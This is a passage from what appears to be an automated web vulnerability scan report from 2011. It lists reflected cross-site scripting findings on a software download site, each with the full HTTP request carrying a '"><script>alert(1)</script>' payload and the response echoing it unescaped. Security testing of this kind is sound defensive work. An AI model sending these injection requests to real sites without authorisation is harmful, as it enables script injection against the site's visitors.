<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads12bf9"><script>alert(1)</script>6fe8131d792/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html" />
...[SNIP]...

4.1723. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742ce"><script>alert(1)</script>f2561d7c8fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html742ce"><script>alert(1)</script>f2561d7c8fe HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html742ce"><script>alert(1)</script>f2561d7c8fe"/>
...[SNIP]...

4.1724. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bbf"><script>alert(1)</script>75abb52cf6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html?e6bbf"><script>alert(1)</script>75abb52cf6c=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html?e6bbf"><script>alert(1)</script>75abb52cf6c=1"/>
...[SNIP]...

4.1725. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8bd"><script>alert(1)</script>2073222b13b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsfe8bd"><script>alert(1)</script>2073222b13b/t-64-bit-easytether-x64-download-byhsbuvf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:24:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsfe8bd"><script>alert(1)</script>2073222b13b/t-64-bit-easytether-x64-download-byhsbuvf.html" />
...[SNIP]...

4.1726. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d668a"><script>alert(1)</script>fda2f2d8370 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.htmld668a"><script>alert(1)</script>fda2f2d8370 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-easytether-x64-download-byhsbuvf.htmld668a"><script>alert(1)</script>fda2f2d8370"/>
...[SNIP]...

4.1727. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b318"><script>alert(1)</script>59af2c6b207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html?2b318"><script>alert(1)</script>59af2c6b207=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:16 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html?2b318"><script>alert(1)</script>59af2c6b207=1"/>
...[SNIP]...

4.1728. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6632"><script>alert(1)</script>c0725bae4aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsd6632"><script>alert(1)</script>c0725bae4aa/t-64-bit-messenger-plus-live-download-upxgwatv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:22:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsd6632"><script>alert(1)</script>c0725bae4aa/t-64-bit-messenger-plus-live-download-upxgwatv.html" />
...[SNIP]...

4.1729. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 583a5"><script>alert(1)</script>95c1c196d99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html583a5"><script>alert(1)</script>95c1c196d99 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html583a5"><script>alert(1)</script>95c1c196d99"/>
...[SNIP]...

4.1730. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978a2"><script>alert(1)</script>f39f418527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html?978a2"><script>alert(1)</script>f39f418527=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html?978a2"><script>alert(1)</script>f39f418527=1"/>
...[SNIP]...

4.1731. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e02"><script>alert(1)</script>f78bbafec09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads87e02"><script>alert(1)</script>f78bbafec09/t-64-bit-news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:18:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads87e02"><script>alert(1)</script>f78bbafec09/t-64-bit-news-file-grabber-download-stclytop.html" />
...[SNIP]...

4.1732. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6727"><script>alert(1)</script>351fce78751 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.htmlc6727"><script>alert(1)</script>351fce78751 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:19:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-news-file-grabber-download-stclytop.htmlc6727"><script>alert(1)</script>351fce78751"/>
...[SNIP]...

4.1733. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70863"><script>alert(1)</script>1a306d3759b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.html?70863"><script>alert(1)</script>1a306d3759b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-news-file-grabber-download-stclytop.html?70863"><script>alert(1)</script>1a306d3759b=1"/>
...[SNIP]...

4.1734. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 479d7"><script>alert(1)</script>109565655ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads479d7"><script>alert(1)</script>109565655ac/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:19:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads479d7"><script>alert(1)</script>109565655ac/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html" />
...[SNIP]...

4.1735. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2edda"><script>alert(1)</script>53ca7435637 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html2edda"><script>alert(1)</script>53ca7435637 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html2edda"><script>alert(1)</script>53ca7435637"/>
...[SNIP]...

4.1736. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a540c"><script>alert(1)</script>1b11e322301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html?a540c"><script>alert(1)</script>1b11e322301=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html?a540c"><script>alert(1)</script>1b11e322301=1"/>
...[SNIP]...

4.1737. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aaf8"><script>alert(1)</script>29f62c52533 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads2aaf8"><script>alert(1)</script>29f62c52533/t-64-bit-nokia-ovi-suite-download-bhfheplp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloads2aaf8"><script>alert(1)</script>29f62c52533/t-64-bit-nokia-ovi-suite-download-bhfheplp.html" />
...[SNIP]...

4.1738. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef19c"><script>alert(1)</script>53099d9c0ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.htmlef19c"><script>alert(1)</script>53099d9c0ac HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.htmlef19c"><script>alert(1)</script>53099d9c0ac"/>
...[SNIP]...

4.1739. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5920"><script>alert(1)</script>1d30e1ca09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html?b5920"><script>alert(1)</script>1d30e1ca09f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
